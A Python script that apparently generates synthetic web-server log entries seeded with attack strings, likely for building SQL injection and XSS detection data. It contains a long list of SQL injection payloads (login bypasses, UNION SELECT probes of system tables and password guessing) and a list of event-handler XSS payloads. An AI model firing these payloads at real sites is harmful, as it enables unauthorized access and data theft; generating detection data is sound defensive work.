import random

# Template
# ip: 128.5.0.1, user - identifier: UD11, name: frank, time - stamp: [10 / Oct / 2000:13: 55:36 - 0700], header: "POST /?id=156498798469&password=message2 HTTP/1.0", status: 200
outputString = ""
names = ["frank", "leon", "guy", "gal", "knot", "charn", "junior", "satang"]
sqli_list = ["\'-\'",
             "\' \'",
             "\'&\'",
             "\'^\'",
             "\'*\'",
             "\' or \'\'-\'",
             "\' or \'\' \'",
             "\' or \'\'&\'",
             "\' or \'\'^\'",
             "\' or \'\'*\'",
             "\"-\"",
             "\" \"",
             "\"&\"",
             "\"^\"",
             "\"*\"",
             "\" or \"\"-\"",
             "\" or \"\" \"",
             "\" or \"\"&\"",
             "\" or \"\"^\"",
             "\" or \"\"*\"",
             "or true--",
             "\" or true--",
             "\' or true--",
             "\") or true--",
             "\') or true--",
             "\' or \'x\'=\'x",
             "\') or (\'x\')=(\'x",
             "\')) or ((\'x\'))=((\'x",
             "\" or \"x\"=\"x",
             "\") or (\"x\")=(\"x",
             "\")) or ((\"x\"))=((\"x",
             "or 1=1",
             "or 1=1--",
             "or 1=1#",
             "or 1=1/*",
             "admin\' --",
             "admin\' #",
             "admin\'/*",
             "admin\' or \'1\'=\'1",
             "admin\' or \'1\'=\'1\'--",
             "admin\' or \'1\'=\'1\'#",
             "admin\' or \'1\'=\'1\'/*",
             "admin\'or 1=1 or \'\'=\'",
             "admin\' or 1=1",
             "admin\' or 1=1--",
             "admin\' or 1=1#",
             "admin\' or 1=1/*",
             "admin\') or (\'1\'=\'1",
             "admin\') or (\'1\'=\'1\'--",
             "admin\') or (\'1\'=\'1\'#",
             "admin\') or (\'1\'=\'1\'/*",
             "admin\') or \'1\'=\'1",
             "admin\') or \'1\'=\'1\'--",
             "admin\') or \'1\'=\'1\'#",
             "admin\') or \'1\'=\'1\'/*",
             "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
             "admin\" --",
             "admin\" #",
             "admin\"/*",
             "admin\" or \"1\"=\"1",
             "admin\" or \"1\"=\"1\"--",
             "admin\" or \"1\"=\"1\"#",
             "admin\" or \"1\"=\"1\"/*",
             "admin\"or 1=1 or \"\"=\"",
             "admin\" or 1=1",
             "admin\" or 1=1--",
             "admin\" or 1=1#",
             "admin\" or 1=1/*",
             "admin\") or (\"1\"=\"1",
             "admin\") or (\"1\"=\"1\"--",
             "admin\") or (\"1\"=\"1\"#",
             "admin\") or (\"1\"=\"1\"/*",
             "admin\") or \"1\"=\"1",
             "admin\") or \"1\"=\"1\"--",
             "admin\") or \"1\"=\"1\"#",
             "admin\") or \"1\"=\"1\"/*",
             "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
             "==",
             "=",
             "\'",
             "\' --",
             "\' #",
             "\' –",
             "\'--",
             "\'/*",
             "\'#",
             "\" --",
             "\" #",
             "\"/*",
             "\' and 1=\'1",
             "\' and a=\'a",
             " or 1=1",
             " or true",
             "\' or \'\'=\'",
             "\" or \"\"=\"",
             "1′) and \'1′=\'1–",
             "\' AND 1=0 UNION ALL SELECT \'\', \'81dc9bdb52d04dc20036dbd8313ed055",
             "\" AND 1=0 UNION ALL SELECT \"\", \"81dc9bdb52d04dc20036dbd8313ed055",
             " and 1=1",
             " and 1=1–",
             "\' and \'one\'=\'one",
             "\' and \'one\'=\'one–",
             "\' group by password having 1=1--",
             "\' group by userid having 1=1--",
             "\' group by username having 1=1--",
             " like \'%\'",
             " or 0=0 --",
             " or 0=0 #",
             " or 0=0 –",
             "\' or         0=0 #",
             "\' or 0=0 --",
             "\' or 0=0 #",
             "\' or 0=0 –",
             "\" or 0=0 --",
             "\" or 0=0 #",
             "\" or 0=0 –",
             "%\' or \'0\'=\'0",
             " or 1=1",
             " or 1=1--",
             " or 1=1/*",
             " or 1=1#",
             " or 1=1–",
             "\' or 1=1--",
             "\' or \'1\'=\'1",
             "\' or \'1\'=\'1\'--",
             "\' or \'1\'=\'1\'/*",
             "\' or \'1\'=\'1\'#",
             "\' or \'1′=\'1",
             "\' or 1=1",
             "\' or 1=1 --",
             "\' or 1=1 –",
             "\' or 1=1--",
             "\' or 1=1;#",
             "\' or 1=1/*",
             "\' or 1=1#",
             "\' or 1=1–",
             "\') or \'1\'=\'1",
             "\') or \'1\'=\'1--",
             "\') or \'1\'=\'1\'--",
             "\') or \'1\'=\'1\'/*",
             "\') or \'1\'=\'1\'#",
             "\') or (\'1\'=\'1",
             "\') or (\'1\'=\'1--",
             "\') or (\'1\'=\'1\'--",
             "\') or (\'1\'=\'1\'/*",
             "\') or (\'1\'=\'1\'#",
             "\'or\'1=1",
             "\'or\'1=1′",
             "\" or \"1\"=\"1",
             "\" or \"1\"=\"1\"--",
             "\" or \"1\"=\"1\"/*",
             "\" or \"1\"=\"1\"#",
             "\" or 1=1",
             "\" or 1=1 --",
             "\" or 1=1 –",
             "\" or 1=1--",
             "\" or 1=1/*",
             "\" or 1=1#",
             "\" or 1=1–",
             "\") or \"1\"=\"1",
             "\") or \"1\"=\"1\"--",
             "\") or \"1\"=\"1\"/*",
             "\") or \"1\"=\"1\"#",
             "\") or (\"1\"=\"1",
             "\") or (\"1\"=\"1\"--",
             "\") or (\"1\"=\"1\"/*",
             "\") or (\"1\"=\"1\"#",
             ") or \'1′=\'1–",
             ") or (\'1′=\'1–",
             "\' or 1=1 LIMIT 1;#",
             "\'or 1=1 or \'\'=\'",
             "\"or 1=1 or \"\"=\"",
             "\' or \'a\'=\'a",
             "\' or a=a--",
             "\' or a=a–",
             "\') or (\'a\'=\'a",
             "\" or \"a\"=\"a",
             "\") or (\"a\"=\"a",
             "\') or (\'a\'=\'a and hi\") or (\"a\"=\"a",
             "\' or \'one\'=\'one",
             "\' or \'one\'=\'one–",
             "\' or uid like \'%",
             "\' or uname like \'%",
             "\' or userid like \'%",
             "\' or user like \'%",
             "\' or username like \'%",
             "\' or \'x\'=\'x",
             "\') or (\'x\'=\'x",
             "\" or \"x\"=\"x",
             "\' OR \'x\'=\'x\'#;",
             "\'=\' \'or\' and \'=\' \'or\'",
             "\' UNION ALL SELECT 1, @@version;#",
             "\' UNION ALL SELECT system_user(),user();#",
             "\' UNION select table_schema,table_name FROM information_Schema.tables;#",
             "admin\' and substring(password/text(),1,1)=\'7",
             "\' and substring(password/text(),1,1)=\'7",
             "\' or 1=1 limit 1 -- -+",
             "\'=\"or\'"]

xss_list = ["<svg onload=alert(1)>",
            "\"><svg onload=alert(1)//",
            "\"onmouseover=alert(1)//",
            "\"autofocus/onfocus=alert(1)//",
            "\'-alert(1)-\'",
            "\'-alert(1)//",
            "\'-alert(1)//",
            "<body onfocus=alert(1)>",
            "<body onhashchange=alert(1)><a href=#x>click this!#x",
            "<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x",
            "<body onscroll=alert(1)><br><br><br><br>",
            "<body onresize=alert(1)>press F12!",
            "<body onhelp=alert(1)>press F1! (MSIE)",
            "<marquee onstart=alert(1)>",
            "<marquee loop=1 width=0 onfinish=alert(1)>",
            "<audio src onloadstart=alert(1)>",
            "<video onloadstart=alert(1)><source>",
            "<input autofocus onblur=alert(1)>",
            "<keygen autofocus onfocus=alert(1)>",
            "<form onsubmit=alert(1)><input type=submit>",
            "<select onchange=alert(1)><option>1<option>2",
            "<menu id=x contextmenu=x onshow=alert(1)>right click me!"
            ]

post_get_list =["POST", "GET"]

def sqliMakerGet(amount, outputString):
    for i in range(amount):
        outputString = outputString + "ip: " + str(random.randint(0, 255)) + "." + str(
            random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(
            random.randint(0, 255)) + ", user-identifier: UD" + str(
            random.randint(0, 255)) + ", name: " + random.choice(
            names) + ", time-stamp: [10 / Oct / 2000:13: 55:36 - 0700]" + ", header: " + random.choice(post_get_list) + " /?id=" + random.choice(
            sqli_list) + "&password=placeholder HTTP/1.0" + ", status: 200\n"

    return outputString


def xssMakerGet(amount, outputString):
    for i in range(amount):
        outputString = outputString + "ip: " + str(random.randint(0, 255)) + "." + str(
            random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(
            random.randint(0, 255)) + ", user-identifier: UD" + str(
            random.randint(0, 255)) + ", name: " + random.choice(
            names) + ", time-stamp: [10 / Oct / 2000:13: 55:36 - 0700]" + ", header: " + random.choice(post_get_list) + " /?id=" + random.choice(
            xss_list) + "&password=placeholder HTTP/1.0" + ", status: 200\n"

    return outputString


if __name__ == "__main__":
    f = open("demofile2.txt", "a")
    # out = sqliMakerGet(50, outputString)
    out = xssMakerGet(250, outputString)
    f.write(out)
    f.close()
